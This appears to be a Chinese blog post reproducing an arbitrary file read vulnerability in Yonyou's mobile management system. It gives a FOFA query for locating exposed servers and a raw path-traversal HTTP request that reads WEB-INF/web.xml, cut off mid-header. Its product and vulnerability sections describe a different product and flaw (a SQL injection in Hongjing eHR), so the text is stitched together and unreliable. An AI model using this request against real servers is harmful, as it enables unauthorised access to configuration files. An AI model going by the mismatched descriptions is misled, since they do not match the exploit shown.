用友 移动管理系统 DownloadServlet 任意文件读取漏洞复现（含nuclei-POC）

免责声明 由于传播、利用本CSDN所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行承担！

一、产品介绍

宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合，满足动态化、协同化、流程化、战略化需求的软件。

二、漏洞描述

宏景eHR FrCodeAddTreeServlet 接口处存在SQL注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL命令，从而获取服务器敏感信息。

三、漏洞危害

未经过身份认证的远程攻击者可利用此漏洞执行任意SQL命令，从而获取服务器敏感信息。

四、漏洞复现

FOFA：app="用友-移动管理系统"

POC如下

GET /servlet/~maportal/;/com.yonyou.maportal.bs.padplugin.controller.DownloadServlet?filename=../../WEB-INF/web.xml HTTP/1.1
Host: url
Connection: keep-alive
sec-ch-ua: "Not_A Brand";v="8